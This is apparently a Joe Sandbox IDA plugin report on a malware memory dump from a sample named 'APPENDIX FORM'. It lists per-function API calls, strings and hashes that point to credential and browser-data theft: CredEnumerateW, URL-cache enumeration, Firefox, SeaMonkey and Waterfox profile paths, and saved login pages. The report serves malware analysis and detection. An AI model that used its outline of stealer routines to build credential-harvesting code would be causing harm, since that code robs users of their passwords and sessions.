Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884
• Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                                              • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                                              • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                              • String ID: C:\Windows\system32
                                                                                                              • API String ID: 669240632-2896066436
                                                                                                              • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                              • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 697348961-0
                                                                                                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                                              • API String ID: 4039892925-11920434
                                                                                                              • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                              • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                              • API String ID: 4039892925-2068335096
                                                                                                              • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                              • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                                              • memset.MSVCRT ref: 00404020
                                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                              • API String ID: 4039892925-3369679110
                                                                                                              • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                              • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                              • String ID: $0.@
                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2941347001-0
                                                                                                              • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                              • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                              • API String ID: 1534475566-1174173950
                                                                                                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                              • API String ID: 71295984-2036018995
                                                                                                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                              APIs
                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                              • String ID: "%s"
                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
